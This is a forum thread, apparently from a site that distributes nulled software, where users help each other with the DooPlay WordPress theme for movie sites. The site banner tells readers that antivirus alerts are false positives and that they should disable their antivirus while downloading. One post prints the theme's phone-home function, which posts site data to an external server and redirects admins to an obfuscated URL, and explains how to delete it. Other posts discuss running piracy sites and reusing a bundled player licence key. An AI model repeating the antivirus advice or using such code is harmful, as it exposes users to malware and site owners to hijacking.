• You MUST read the Babiato Rules before making your first post otherwise you may get permanent warning points or a permanent Ban.

Our resources on Babiato Forum are CLEAN and SAFE. So you can use them for development and testing purposes. If your are on Windows and have an antivirus that alerts you about a possible infection: Know it's a false positive because all scripts are double checked by our experts. We advise you to add Babiato to trusted sites/sources or disable your antivirus momentarily while downloading a resource. "Enjoy your presence on Babiato"

DooPlay - WordPress Theme for Movies and TVShows

DooPlay - WordPress Theme for Movies and TVShows v2.5.5

No permission to download
J

So you need a payment just to tell us how to fix this? What about you got the theme for free on this forum ? I don't know why the other guy with a fix in this thread got a ban, but I think you should be banned too. Both of you didn't bring a real solution in this thread, just joking around with users in need. If you want to help them, help for real if you want to sell something then go and open a thread in the proper forum section.

P.s: I got the redirect problem today and I fixed it, it is the same fix that those guys have done, but I will show you how to do it.

Go to: wp-content/themes/dooplay/inc/do_init.php and search for this: Camelot or for this: $response = wp_remote_post('https://api.wupdater.com', doo_siteinfo());
Then delete from 761 - 787: if(!function_exists('doo_camelot')){ function doo_camelot(){ if(!empty(doo_codeframework('framework'))){ $transient = get_transient('dooplay_website'); if(false === $transient){ $response = wp_remote_post('https://api.wupdater.com', doo_siteinfo()); if(!is_wp_error($response)){ $json = wp_remote_retrieve_body($response); $json = json_decode($json,TRUE); $sccs = isset($json['success']) ? $json['success'] : false; $hash = isset($json['synhash']) ? $json['synhash'] : false; if($sccs == true && !empty($hash)){ $hashing = $hash; }else{ $hashing = 'error_404'; } }else{ $hashing = 'error_500'; } set_transient('dooplay_website', $hashing, 1 * HOUR_IN_SECONDS); }elseif(isset($transient['b']) && $transient['b'] === 'c'){ wp_redirect('ht'.'tp'.'s:'.'//'.doo_outer(),302); exit; } } } add_action('admin_enqueue_scripts','doo_camelot',20); }

P.s.s: This is not my fix, I'm just showing you how to fix it because those 2 cryptic guys just wanted to sell you something.
GREAT! Thank you and it works and I did not PAY anything to other!
Thank you ! You deserve!

Reactions: AnormaL
hello can anyone help? provide a way to add a episode in front of the poster like in the picture above? Very happy if someone wants to help answer. thanks
Screenshot 2021-11-17 16001sad5.png

Reactions: sxload
hello can anyone help? provide a way to add a episode in front of the poster like in the picture above? Very happy if someone wants to help answer. thanks
Screenshot 2021-11-17 16001sad5.png
EZ.. Taxonomies
1637141725745.png
Here is a Detailed video for Season Number and Episode Number to be displayed.. Change the CSS as per your Needs

Anyone facing this issue? The trailer loads fine, but none of the servers work. They are stuck at loading player. Tried clearing cache, different browsers, etc.

doo.JPG

I've got a few questions, can anyone help me?

1. When you manually add video sources, can you include different qualities and subtitles? Also, what about HLS?
2. I see JW Player is already included with a key, does that key have expiration? Because if it doesn't, I want to use it to manually make embeddable video page, and embed it on dooplay themed site. Then, my problems will be gone.

Last edited:
What does the request mean on the dashboard?
I can add request posts. And click the request buttion on the top DBMVS nav.

But i really don't know what does that mean.

What does the request mean on the dashboard?
I can add request posts. And click the request buttion on the top DBMVS nav.

But i really don't know what does that mean.
means that users can make movie or tv show requests for you to add to the website

Arcane_ 1x1 _ Movie Minions.png

Hi guys, can anyone help me change this text from (Video Sources) to (Download Sources)
Step 1: Download VS Code
Step 2: open Theme In VS Code
Step 3: Search for "Video Sources" in the Theme Files
Step 4: Replace it!

(PS- I hope no one will spoon feed him with exact File Location and Line number)

Step 1: Download VS Code
Step 2: open Theme In VS Code
Step 3: Search for "Video Sources" in the Theme Files
Step 4: Replace it!

(PS- I hope no one will spoon feed him with exact File Location and Line number)
Thanks, bro, I had already tried something similar. But instead, I had used RAR for searching for a file with text (Video Sources) I found it under dooplay/inc/csf/options.video-player.php. I changed the title to "Download Sources" but it only changed on the Admin area under dooplay options/video player. Then today I tried again and found another file with video sources under dooplay/inc/doo_player.php line 275 and this one worked. Thanks for the assist though.

Reactions: BlakenFist
AdBlock Detected

We get it, advertisements are annoying!

However in order to keep our huge array of resources free of charge we need to generate income from ads so to use the site you will need to turn off your adblocker.

If you'd like to have an ad free experience you can become a Babiato Lover by donating as little as $5 per month. Click on the Donate menu tab for more info.

I've Disabled AdBlock